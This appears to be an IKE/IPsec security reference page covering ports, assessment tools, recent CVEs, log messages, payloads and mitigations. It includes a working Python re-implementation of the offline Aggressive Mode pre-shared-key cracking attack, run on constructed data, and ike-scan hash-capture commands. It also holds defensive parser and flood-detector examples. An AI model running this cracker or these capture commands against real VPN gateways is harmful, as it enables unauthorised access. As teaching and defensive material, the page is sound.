05 Apr, 2023

The Internet Key Exchange (IKE)


The Internet Key Exchange (IKE) protocol is the key-management protocol used to set up and maintain IPsec VPN tunnels. IKE itself carries no user data: it negotiates the security associations (SAs) that IPsec's ESP (or, rarely, AH) then uses to encrypt and authenticate packets.
IKE negotiates the encryption, integrity and Diffie-Hellman parameters for the tunnel, authenticates the two endpoints (by pre-shared key, certificate or, in IKEv2, EAP), and derives the symmetric keys that protect both the IKE channel and the IPsec traffic. The shared secret comes from a Diffie-Hellman exchange, so the keys themselves are never sent on the wire; what an eavesdropper sees is public values, nonces and authentication data.

IKE common ports

UDP port 500 – The standard port for IKE, for both IKEv1 and IKEv2. Only the negotiation travels here (IKEv1 Phase 1 and Phase 2, IKEv2 IKE_SA_INIT and IKE_AUTH). The encrypted user traffic is not carried on UDP 500; once the SAs are up it goes in ESP (IP protocol 50).

UDP port 4500 – NAT Traversal (NAT-T). When either peer detects a NAT in the path, IKE moves to UDP 4500 and ESP is wrapped in UDP on the same port (a 4-byte non-ESP marker tells IKE and ESP packets apart). A tunnel through NAT therefore shows everything on 4500 and nothing on protocol 50.

TCP port 10000 – Not a standard IKE port. It is the default for Cisco's proprietary IPsec-over-TCP, used by the legacy Cisco VPN Client and ASA to get through firewalls that drop UDP. The standards-track TCP encapsulation of IKEv2 and ESP (RFC 8229) uses TCP 4500 instead.

UDP port 1701 – L2TP, not IKE. In an L2TP/IPsec VPN, IKE still runs on UDP 500/4500 to set up a transport-mode IPsec SA, and the L2TP control and data on UDP 1701 are carried inside it. A gateway that answers UDP 1701 in the clear from the Internet is misconfigured.

UDP port 62515 – Not an IKEv2 port. IKEv2 uses the same UDP 500 and 4500 as IKEv1 and is told apart by the major version field in the IKE header, not by a port number. Port 62515 appears in vendor documentation as the default client-side source port of the legacy Cisco VPN Client and has no IANA assignment for IKE.

Standard tools for probing IKE

Probe only gateways you are authorised to test. These are the standard command-line tools used during an IKE assessment:

ike-scan – Discovers and fingerprints IKE responders. It sends IKEv1 Phase 1 proposals (and, with --ikev2, IKE_SA_INIT) to a host or range, identifies the implementation from its Vendor ID payloads and from its retransmission backoff pattern (--showbackoff), and with -A (Aggressive Mode) plus -P writes the responder's PSK hash to a file for offline cracking.

psk-crack (from the ike-scan package) – Runs an offline dictionary (-d) or brute-force (-b) attack against the hash file that ike-scan -P produced. It sends nothing to the VPN, so account lockout and rate limiting do not apply; only the strength of the PSK does.

ikecrack – An older tool doing the same offline attack: fed the Aggressive Mode exchange (nonces, DH public values, cookies, SA and ID payloads) and the captured HASH_R, it tries candidate pre-shared keys until one reproduces the hash.

IKEProbe – Sends IKEv1 Phase 1 proposals with a range of transform sets to find out whether the responder will complete Aggressive Mode with PSK authentication, which is the precondition for the attack above. It is a mode and transform prober, not a fuzzer.

Manual Tools:

  • Wireshark – Captures and decodes IKE with its isakmp dissector (display filter isakmp, covering both IKEv1 and IKEv2). It shows the proposals, Vendor IDs and Notify types in each message and, given the session keys (the ISAKMP and IKEv2 decryption tables in its protocol preferences), can decrypt the encrypted payloads.

  • IKEProbe – As above: probes which IKEv1 modes and transform sets a responder accepts.

  • IKEView – Check Point's viewer for the ike.elg and vpnd.elg debug logs written by a Security Gateway. It lays out each exchange graphically, which is the quickest way to see why a negotiation with a Check Point peer fails.

  • ike-scan – As above: discovery, fingerprinting and Aggressive Mode hash capture.

  • strongSwan – Open-source IPsec stack with IKEv1 and IKEv2 support (the charon daemon). Useful as a configurable reference peer when testing another implementation; its logs name every Notify it receives.

  • OpenIKEv2 – An open-source IKEv2 implementation, usable as a test peer.

  • racoon – The IKEv1 daemon from the ipsec-tools/KAME project. It is unmaintained and IKEv1-only, but still useful for reproducing legacy Main Mode and Aggressive Mode behaviour.

  • v2tester – A tool for exercising IKEv2 implementations by simulating different client and server behaviours.

  • IKECrack – As above: offline recovery of an Aggressive Mode pre-shared key.

  • psk-crack – As above: offline attack on the hashes captured by ike-scan.
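The attack that psk-crack and IKECrack run, as an added example that is not code from the original page or from either tool. It re-implements the RFC 2409 key derivation that makes IKEv1 Aggressive Mode with PSK crackable offline: HASH_R is sent in the clear, and every input to it except the PSK is visible in the same exchange. All nonces, public values, cookies and the wordlist are constructed for the demo; in practice they come from the file written by `ike-scan -A -P`.

```python
"""
Added example, not code from the original page or from ike-scan/psk-crack/IKECrack:
a minimal re-implementation of the offline attack those tools run against IKEv1
Aggressive Mode with pre-shared-key authentication (RFC 2409, section 5.4).
Every value below is constructed for the demo, not captured traffic.
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b); prf is HMAC of the negotiated hash (SHA-1 here)."""
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def hash_r(skeyid: bytes, x: Dict[str, bytes]) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    msg = x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def crack_psk(x: Dict[str, bytes], captured_hash_r: bytes,
              candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the candidate PSK that reproduces the captured HASH_R, or None.
    Nothing is sent to the gateway, so lockout and rate limiting never apply."""
    for cand in candidates:
        trial = hash_r(skeyid_psk(cand, x["ni_b"], x["nr_b"]), x)
        if hmac.compare_digest(trial, captured_hash_r):
            return cand
    return None


# Constructed stand-in for a captured Aggressive Mode exchange (not real traffic).
DEMO_EXCHANGE: Dict[str, bytes] = {
    "ni_b":   bytes.fromhex("0102030405060708" * 2),     # initiator nonce
    "nr_b":   bytes.fromhex("f0e1d2c3b4a59687" * 2),     # responder nonce
    "g_xi":   b"\xaa" * 128,                             # initiator DH public value (1024-bit group)
    "g_xr":   b"\xbb" * 128,                             # responder DH public value
    "cky_i":  bytes.fromhex("1111111111111111"),         # initiator cookie
    "cky_r":  bytes.fromhex("2222222222222222"),         # responder cookie
    "sai_b":  bytes(44),                                 # initiator SA payload body (placeholder)
    "idir_b": bytes([2, 17, 0x01, 0xf4]) + b"vpn.example.com",  # IDir: ID_FQDN, UDP, port 500
}
DEMO_WORDLIST = [b"password", b"admin", b"vpn2023", b"cisco123", b"letmein"]


def responder_hash_r(true_psk: bytes) -> bytes:
    """What the responder puts on the wire for DEMO_EXCHANGE under the given PSK."""
    sk = skeyid_psk(true_psk, DEMO_EXCHANGE["ni_b"], DEMO_EXCHANGE["nr_b"])
    return hash_r(sk, DEMO_EXCHANGE)


def demo() -> dict:
    """A dictionary PSK falls to the wordlist; a 32-byte random PSK does not."""
    weak = crack_psk(DEMO_EXCHANGE, responder_hash_r(b"cisco123"), DEMO_WORDLIST)
    strong = crack_psk(DEMO_EXCHANGE, responder_hash_r(bytes(range(32))), DEMO_WORDLIST)
    return {"weak_psk": weak, "strong_psk": strong}


if __name__ == "__main__":
    print(demo())   # {'weak_psk': b'cisco123', 'strong_psk': None}
```

Main Mode does not have this weakness because HASH_R is sent encrypted after the DH exchange, and IKEv2 does not have it at all; that is why the fix is to refuse Aggressive Mode with PSK (or move to IKEv2 with certificates) rather than to rate-limit the gateway, which the offline attack never touches.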

Automated Tools:

  • Nmap – The ike-version NSE script (nmap -sU -p 500 --script ike-version) probes UDP 500, reports whether the target speaks IKEv1 and/or IKEv2, and extracts the vendor and, where available, device type from the Vendor ID payloads it returns.

  • Nessus – Includes plugins that detect IKE services, flag Aggressive Mode with PSK, and match vendor versions against published IKE advisories, with remediation advice.

  • Metasploit – Carries auxiliary modules under auxiliary/scanner/ike/ (for example cisco_ike_benigncertain, the IKEv1 memory-disclosure check). Use them to verify a specific finding, not for discovery.

  • ExploitDB – Not a scanner but an archive of public exploits and proof-of-concept code, searchable for IKE-related entries by vendor and CVE.

  • Snort – Rulesets for Snort (community and Emerging Threats) include signatures keyed on UDP 500/4500 for known IKE exploits and for negotiation floods.

  • Suricata – Uses the same rule language as Snort and, since version 6, parses IKE as an application-layer protocol, logging exchange types, Vendor IDs and proposals to EVE JSON so that detection logic can match on decoded fields rather than raw bytes.

  • Security Onion – Network security monitoring distribution bundling Suricata, Zeek and full packet capture, so IKE traffic can be alerted on and then opened in Wireshark.

  • Qualys – Vulnerability management platform with detections for IKE services and vulnerable vendor versions, with remediation guidance.

  • Shodan – Indexes responses from Internet-facing UDP 500 services, including Vendor IDs, so it can find exposed IKE gateways by vendor. It only reports what it indexed; testing an implementation still requires authorised probing.

  • Burp Suite – Not an IKE tool: it tests HTTP, and there is no Burp extension that speaks IKE. It belongs in a VPN assessment only for the appliance's web surfaces (SSL-VPN login portal, administration UI), not for UDP 500/4500.

Five recent CVEs for IKE (as of the post date)

• CVE-2023-24859 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability 

• CVE-2023-22404 – An Out-of-bounds Write vulnerability in the Internet Key Exchange Protocol daemon (iked) of Juniper Networks Junos OS on SRX series and MX with SPC3 allows an authenticated, network-based attacker to cause a Denial of Service (DoS). iked will crash and restart, and the tunnel will not come up when a peer sends a specifically formatted payload during the negotiation. This will impact other IKE negotiations happening at the same time. Continued receipt of this specifically formatted payload will lead to continuous crashing of iked and thereby the inability for any IKE negotiations to take place. Note that this payload is only processed after the authentication has successfully completed. So the issue can only be exploited by an attacker who can successfully authenticate. This issue affects Juniper Networks Junos OS on SRX Series, and MX Series with SPC3: All versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R3-S1; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S2, 22.1R2.

• CVE-2023-21758 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21683.

• CVE-2023-21683 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21758.

• CVE-2023-21677 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21683, CVE-2023-21758.

Useful information

– IKE is the key-exchange and SA-management protocol of IPsec: it establishes an IKE SA between two peers and then the IPsec (Child) SAs that actually carry traffic.

– IKE is used in conjunction with IPsec: IKE negotiates and keys the SAs, while ESP (or AH) provides the per-packet encryption and integrity.

– There are two versions: IKEv1 (RFC 2409, with ISAKMP framing and Main and Aggressive Modes) and IKEv2 (RFC 7296). IKEv1 is not broken as such, but Aggressive Mode with PSK leaks an offline-crackable hash, its exchanges are more complex, and it has no built-in DoS protection; IKEv2 removes all three issues and should be the default.

– IKEv2 supports a wider range of authentication methods than IKEv1, including certificate-based authentication and Extensible Authentication Protocol (EAP), and the two sides may use different methods (for example a certificate on the gateway and EAP-MSCHAPv2 on the client).

– IKEv2 is also designed for mobile and remote-access use: MOBIKE (RFC 4555) lets a client change address without renegotiating, and dead-peer detection is part of the protocol.

– IKE uses Diffie-Hellman to agree a shared secret that is never sent on the wire, a PSK, certificate or EAP exchange to authenticate the peers, and an HMAC-based pseudo-random function to derive the symmetric IKE and IPsec keys from that secret.

– Both versions rekey; in IKEv2 the CREATE_CHILD_SA exchange rekeys Child SAs (and the IKE SA itself) so keys are replaced periodically without dropping the tunnel.

– Attacks against IKE include offline brute force of weak PSKs (IKEv1 Aggressive Mode), state-exhaustion DoS from spoofed initiators (mitigated in IKEv2 by the COOKIE notify), and man-in-the-middle where peer authentication is weak or mis-configured; replay is prevented by nonces and, in IKEv2, by message IDs.

– IKE implementations can also be vulnerable to configuration errors (weak DH groups, permissive proposals, unrestricted peer IDs) or to parsing bugs in the daemon itself, as the CVEs above show.

Known banners

IKE is a binary protocol and sends no text banner. A responder is identified from its Vendor ID payloads, from which proposals it accepts and from its retransmission backoff timing (ike-scan --showbackoff). The strings below are therefore what you see in daemon logs (strongSwan, Libreswan, vendor syslog) or in a Wireshark decode, not on the wire; the exact wording varies by implementation, and several of them map directly to IKE Notify types:

“IKE responder ready” – A daemon start-up message: the IKE responder is listening on UDP 500/4500.

“IKEv1 responder ready” – The same, for an IKEv1-only service.

“IKEv2 responder ready” – The same, for an IKEv2 service.

“IKEv1 Initialization Complete” – The IKEv1 daemon finished loading its listeners and policies.

“IKEv2 Initialization Complete” – The same, for IKEv2.

“no proposal chosen” – The NO_PROPOSAL_CHOSEN Notify (type 14 in both IKEv1 and IKEv2): none of the initiator's transform sets matched the responder's policy. The usual cause is a cipher, integrity algorithm, DH group or lifetime mismatch.

“invalid payload received” – The responder could not parse a payload (INVALID-PAYLOAD-TYPE in IKEv1, INVALID_SYNTAX, type 7, in IKEv2). Seen when probing with malformed packets, or when an IKEv1-only peer is sent IKEv2.

“authentication failed” – The AUTHENTICATION_FAILED Notify (type 24): the PSK, certificate or EAP credential did not verify, or the peer's ID did not match policy.

“IKE SA negotiation failed” – A generic failure line; the preceding Notify or timeout says why.

“IKE SA established” – Phase 1 (IKEv1) or IKE_AUTH (IKEv2) completed: the peers are authenticated and Child SA negotiation can proceed.

Books for studies The Internet Key Exchange (IKE) protocol

IKEv2 IPsec Virtual Private Networks: Understanding and Deploying IKEv2, IPsec VPNs, and FlexVPN in Cisco IOS by Graham Bartlett and Amjad Inamdar. This book provides a comprehensive introduction to IKEv2 and IPsec VPNs, with practical examples and configuration guides for deploying them in a Cisco IOS environment.

IKEv2: IPsec Virtual Private Network Fundamentals by Graham Bartlett and Amjad Inamdar. This book is a more in-depth exploration of IKEv2, with a focus on its architecture, configuration, and operation.

IPSec VPN Design by Vijay Bollapragada, Mohamed Khalid, and Scott Wainner. This book provides a comprehensive overview of IPSec VPNs, including the role of IKE in their operation and configuration.

Network Security Principles and Practices by Saadat Malik. This book covers a wide range of network security topics, including a detailed discussion of IKE and its role in securing VPNs.

Virtual Private Networks, Second Edition by Charlie Scott, Paul Wolfe and Mike Erwin (O'Reilly). This book provides a comprehensive introduction to VPNs, including a discussion of IKE and other key protocols used in their operation.

List of Payload for The Internet Key Exchange (IKE) protocol

  • Nonce payload (Nx): Both peers send a nonce (Ni from the initiator, Nr from the responder), a fresh random value that is mixed into key derivation and guarantees that keys differ between runs even with the same PSK and DH values. Its freshness is what defeats replay of an old exchange.

  • Key Exchange payload (KE): Carries the Diffie-Hellman group number and the sender's public value; the shared secret derived from the two KE payloads seeds all session keys.

  • Identification payload (IDx): Identifies the initiator (IDi) or responder (IDr). The ID type may be an IPv4/IPv6 address, an FQDN, an e-mail address, an ASN.1 DN taken from a certificate, or a key ID. The gateway should check the ID against policy rather than accept any ID that happens to authenticate.

  • Vendor ID payload (VID): Identifies the implementation or advertises a vendor extension. It is what ike-scan and Nmap fingerprint, so it is also the first thing an attacker learns about the gateway.

  • Certificate payload (CERT): Carries the sender's certificate (or a chain, a CRL, or a URL to one) so the peer can verify its signature. Either side may send it, usually in response to a Certificate Request (CERTREQ) payload listing the CAs the peer trusts.

  • Authentication payload (AUTH): Each peer sends its own AUTH to prove its identity: a MAC keyed from the PSK, or a digital signature, computed over its first message of the exchange, the peer's nonce and its own ID. The initiator authenticates itself with AUTH in IKE_AUTH and the responder does the same in its reply; in IKEv1 the HASH_I and HASH_R payloads play this role.

  • Security Association payload (SA): Lists the proposals for the SA being set up, each with its encryption, integrity, pseudo-random-function and DH transforms and key lengths; the responder selects exactly one transform of each type and returns it.

  • Traffic Selector Initiator payload (TSi): The address ranges, protocols and ports that the initiator wants protected by the Child SA, from its side.

  • Traffic Selector Responder payload (TSr): The same from the responder's side; the responder may narrow the initiator's selectors and returns the result.

  • Notification payload (NOTIFY): Carries status or error information: errors such as NO_PROPOSAL_CHOSEN and AUTHENTICATION_FAILED, and status notifies such as NAT_DETECTION_SOURCE_IP, COOKIE (DoS protection) and INITIAL_CONTACT.
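How the payload list above is laid out on the wire, and how the Notify types behind the "no proposal chosen" style log lines in the Known banners section are decoded, as an added example that is not code from the original page or from any IKE implementation. It builds an IKE_SA_INIT request and a rejecting response, parses them back, and rejects a message whose payload length claims more bytes than the datagram holds. The SPIs, SA body and Vendor ID string are constructed placeholders; nothing is sent on the network.

```python
"""
Added example, not code from the original page or from any IKE daemon: a minimal
IKEv2 message builder and strict parser (RFC 7296 sections 3.1-3.2, 3.4, 3.10)
that walks the payload chain and decodes KE and Notify payloads. All bytes are
constructed for the demo; nothing is sent on the wire.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# IKE header: SPIi(8) SPIr(8) NextPayload(1) Version(1) ExchangeType(1) Flags(1) MessageID(4) Length(4)
IKE_HEADER = struct.Struct("!8s8sBBBBII")
# Generic payload header: NextPayload(1) Critical|Reserved(1) PayloadLength(2); length includes the header
PAYLOAD_HDR = struct.Struct("!BBH")
IKEV2_VERSION = 0x20                      # major 2, minor 0
FLAG_INITIATOR, FLAG_RESPONSE = 0x08, 0x20
PAYLOAD_NAMES: Dict[int, str] = {
    33: "SA", 34: "KE", 35: "IDi", 36: "IDr", 37: "CERT", 38: "CERTREQ", 39: "AUTH", 40: "Nonce",
    41: "N", 42: "D", 43: "V", 44: "TSi", 45: "TSr", 46: "SK", 47: "CP", 48: "EAP"}
EXCHANGE_NAMES = {34: "IKE_SA_INIT", 35: "IKE_AUTH", 36: "CREATE_CHILD_SA", 37: "INFORMATIONAL"}
NOTIFY_NAMES = {7: "INVALID_SYNTAX", 14: "NO_PROPOSAL_CHOSEN", 17: "INVALID_KE_PAYLOAD",
                24: "AUTHENTICATION_FAILED", 16388: "NAT_DETECTION_SOURCE_IP",
                16389: "NAT_DETECTION_DESTINATION_IP", 16390: "COOKIE"}


@dataclass
class Payload:
    ptype: int
    critical: bool
    body: bytes

    @property
    def name(self) -> str:
        return PAYLOAD_NAMES.get(self.ptype, f"UNKNOWN({self.ptype})")


@dataclass
class IkeMessage:
    spi_i: bytes
    spi_r: bytes
    exchange: int
    flags: int
    msg_id: int
    payloads: List[Payload]

    @property
    def is_response(self) -> bool:
        return bool(self.flags & FLAG_RESPONSE)


def build_message(spi_i: bytes, spi_r: bytes, exchange: int, flags: int, msg_id: int,
                  payloads: List[Tuple[int, bytes]]) -> bytes:
    """Serialise a header plus payload chain; each payload's Next Payload names the one after it."""
    chain = b""
    for i, (ptype, body) in enumerate(payloads):
        nxt = payloads[i + 1][0] if i + 1 < len(payloads) else 0
        chain += PAYLOAD_HDR.pack(nxt, 0, PAYLOAD_HDR.size + len(body)) + body
    first = payloads[0][0] if payloads else 0
    hdr = IKE_HEADER.pack(spi_i, spi_r, first, IKEV2_VERSION, exchange, flags, msg_id,
                          IKE_HEADER.size + len(chain))
    return hdr + chain


def parse_message(data: bytes) -> IkeMessage:
    """Strict parse: every declared length is checked against the datagram before use,
    so a payload that claims more bytes than exist is rejected instead of read past the end."""
    if len(data) < IKE_HEADER.size:
        raise ValueError("short IKE header")
    spi_i, spi_r, nxt, ver, exch, flags, msg_id, length = IKE_HEADER.unpack_from(data, 0)
    if ver >> 4 != 2:
        raise ValueError(f"not IKEv2 (major version {ver >> 4})")
    if length != len(data):
        raise ValueError(f"header length {length} != datagram length {len(data)}")
    payloads: List[Payload] = []
    off = IKE_HEADER.size
    while nxt != 0:
        if off + PAYLOAD_HDR.size > len(data):
            raise ValueError("payload header runs past end of message")
        next_nxt, crit, plen = PAYLOAD_HDR.unpack_from(data, off)
        if plen < PAYLOAD_HDR.size or off + plen > len(data):
            raise ValueError(f"bad payload length {plen} at offset {off}")
        payloads.append(Payload(nxt, bool(crit & 0x80), data[off + PAYLOAD_HDR.size:off + plen]))
        off, nxt = off + plen, next_nxt
    if off != len(data):
        raise ValueError("trailing bytes after last payload")
    return IkeMessage(spi_i, spi_r, exch, flags, msg_id, payloads)


def ke_group(p: Payload) -> int:
    """KE body: DH Group Num(2) Reserved(2) Key Exchange Data."""
    if p.ptype != 34 or len(p.body) < 4:
        raise ValueError("not a well-formed KE payload")
    return struct.unpack_from("!H", p.body, 0)[0]


def notify_type(p: Payload) -> Tuple[int, str]:
    """Notify body: Protocol ID(1) SPI Size(1) Notify Message Type(2) SPI(var) data."""
    if p.ptype != 41 or len(p.body) < 4:
        raise ValueError("not a well-formed Notify payload")
    _proto, spi_size, ntype = struct.unpack_from("!BBH", p.body, 0)
    if 4 + spi_size > len(p.body):
        raise ValueError("Notify SPI size exceeds payload")
    return ntype, NOTIFY_NAMES.get(ntype, f"UNKNOWN({ntype})")


def demo() -> dict:
    spi_i = bytes.fromhex("0011223344556677")
    # Initiator's IKE_SA_INIT: SA (placeholder body), KE for MODP-2048 (group 14), Ni, Vendor ID.
    request = build_message(spi_i, bytes(8), 34, FLAG_INITIATOR, 0, [
        (33, bytes(44)), (34, struct.pack("!HH", 14, 0) + b"\xaa" * 256),
        (40, b"\x11" * 32), (43, b"strongSwan")])
    req = parse_message(request)
    # Responder rejects the proposal: IKE_SA_INIT response carrying only N(NO_PROPOSAL_CHOSEN).
    resp = parse_message(build_message(spi_i, bytes.fromhex("8899aabbccddeeff"), 34, FLAG_RESPONSE,
                                       0, [(41, struct.pack("!BBH", 0, 0, 14))]))
    bad = bytearray(request)                        # first payload now claims 0xFFFF bytes
    struct.pack_into("!H", bad, IKE_HEADER.size + 2, 0xFFFF)
    try:
        parse_message(bytes(bad))
        rejected = False
    except ValueError:
        rejected = True
    return {"request_exchange": EXCHANGE_NAMES[req.exchange],
            "request_payloads": [p.name for p in req.payloads],
            "ke_group": ke_group(req.payloads[1]),
            "response_is_response": resp.is_response,
            "response_notify": notify_type(resp.payloads[0])[1],
            "malformed_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

The parser deliberately refuses anything it cannot account for (version, total length, each payload length, trailing bytes): the DoS CVEs listed earlier are all in this code path of real daemons, and a strict walk of the chain is the cheap part of not joining them.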

Mitigation

  1. Limit the rate of new IKE negotiations per source address so that one client cannot flood the gateway with IKE_SA_INIT or Main Mode requests, and cap the number of half-open IKE SAs; in IKEv2 also enable the COOKIE exchange so that spoofed-source floods cost the attacker a round trip before any state is created.

  2. Restrict who can reach UDP 500/4500 at all: for site-to-site tunnels allow only the known peer addresses, and place IDS/IPS signatures for IKE floods and known malformed-packet exploits in front of the gateway.

  3. Apply the same rate limiting and throttling to the expensive second step (DH computation, certificate validation, EAP), since an attacker who gets past the first message can still exhaust CPU.

  4. Authenticate peers with certificates or EAP rather than pre-shared keys where possible. Where a PSK is required, make it long and random rather than a dictionary word, use a distinct PSK per peer, and never offer IKEv1 Aggressive Mode with PSK, which hands out an offline-crackable hash; prefer IKEv2 throughout.

  5. Do not rely on NAT to hide the gateway: a VPN endpoint must be reachable on UDP 500/4500, so scanners such as Shodan will find it. Reduce what it reveals instead (tighten proposals to a modern cipher suite, do not advertise unused vendor extensions) and keep the daemon patched, since the CVEs above are all reachable through the negotiation itself.
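The two flood patterns that items 1 and 2 above distinguish, as an added example that is not code from the original page or from any IDS product: a sliding-window count per source, which catches a single noisy client, and a count of distinct sources per window, which is the only one that sees a spoofed-source flood. It runs over constructed log lines; the line format, the addresses and the thresholds are assumptions made for the demo, and parse_line() is what you would adapt to real flow or IKE daemon logs.

```python
"""
Added example, not code from the original page or from any IDS: a sliding-window
detector for IKE negotiation floods, run over constructed log lines. The log
format, addresses and thresholds are assumptions made for the demo.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone
from typing import Deque, Dict, List, Tuple

# Constructed log format for the demo: "<ISO8601> src=<ip> dport=<port> exch=<exchange name>"
LINE_RE = re.compile(r"^(\S+) src=(\S+) dport=(\d+) exch=(\S+)$")
IKE_PORTS = (500, 4500)
# Messages that open a new IKE SA: IKEv2 IKE_SA_INIT, IKEv1 Main Mode (IDPROT) and Aggressive Mode.
SA_OPENERS = {"IKE_SA_INIT", "IDPROT", "AGGRESSIVE"}
Event = Tuple[float, str, int, str]   # (timestamp, src_ip, dst_port, exchange)


def parse_line(line: str) -> Event:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00")).timestamp()
    return ts, m.group(2), int(m.group(3)), m.group(4)


def sa_openers(events: List[Event]) -> List[Event]:
    """Keep only messages that would create responder state."""
    return [e for e in events if e[2] in IKE_PORTS and e[3] in SA_OPENERS]


def per_source_floods(events: List[Event], max_per_window: int, window_s: float) -> Dict[str, int]:
    """Peak count of SA-opening messages per source within any window_s seconds,
    reported only for sources exceeding max_per_window (the single-client flood
    that per-IP rate limiting stops)."""
    windows: Dict[str, Deque[float]] = defaultdict(deque)
    peaks: Dict[str, int] = {}
    for ts, src, _port, _exch in sa_openers(events):      # events are in time order
        q = windows[src]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) > max_per_window:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


def peak_distinct_sources(events: List[Event], window_s: float) -> int:
    """Peak number of distinct sources opening IKE SAs within any window. A spike
    here with one or two messages per source is a spoofed-source flood, which
    per-IP limits cannot see; IKEv2's COOKIE exchange is the control for it."""
    q: Deque[Tuple[float, str]] = deque()
    peak = 0
    for ts, src, _port, _exch in sa_openers(events):
        q.append((ts, src))
        while ts - q[0][0] > window_s:
            q.popleft()
        peak = max(peak, len({s for _, s in q}))
    return peak


def constructed_log() -> List[str]:
    """Synthetic traffic (constructed, not captured): one legitimate peer, one
    single-source flood, one spoofed-source flood and one unrelated exchange."""
    base = datetime(2023, 4, 5, 10, 0, 0, tzinfo=timezone.utc).timestamp()

    def line(t: float, src: str, exch: str = "IKE_SA_INIT", dport: int = 500) -> str:
        iso = datetime.fromtimestamp(base + t, timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        return f"{iso} src={src} dport={dport} exch={exch}"

    lines = [line(t, "198.51.100.2") for t in (0, 30, 61)]             # site-to-site peer rekeying
    lines += [line(1 + i * 0.05, "203.0.113.7") for i in range(60)]      # 60 inits in 3 s from one host
    lines += [line(5 + i * 0.1, f"192.0.2.{i}") for i in range(1, 80)]   # 79 sources, one init each
    lines += [line(2, "198.51.100.9", "INFORMATIONAL", 4500)]            # not a new SA; ignored
    return sorted(lines)   # fixed-width ISO timestamps sort chronologically


def demo() -> dict:
    events = [parse_line(l) for l in constructed_log()]
    return {"per_source_floods": per_source_floods(events, max_per_window=20, window_s=10.0),
            "peak_distinct_sources": peak_distinct_sources(events, window_s=10.0)}


if __name__ == "__main__":
    print(demo())   # {'per_source_floods': {'203.0.113.7': 60}, 'peak_distinct_sources': 80}
```

The first detector fires on 203.0.113.7 alone; the 79 spoofed sources never cross a per-IP threshold and only show up as the jump in distinct initiators. That second number is the one to alert on and the one to drive IKEv2's cookie mechanism from (strongSwan exposes it as charon.cookie_threshold, the number of half-open SAs at which it starts demanding cookies).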

Conclusion

Internet Key Exchange (IKE) protocol is an important component of secure communication over IP networks. It is used to establish security associations and negotiate key exchange between two parties, such as a VPN gateway and a remote client. The IKE protocol provides strong security mechanisms to ensure the confidentiality, integrity, and authenticity of the communication. However, like any security protocol, it is also vulnerable to attacks such as denial of service (DoS) attacks. To mitigate these vulnerabilities, network administrators can implement various strategies such as rate limiting, firewalls, and intrusion detection systems. Overall, the IKE protocol is a critical element of secure communication and its usage continues to grow as more organizations adopt VPN technologies for remote access and secure communication.
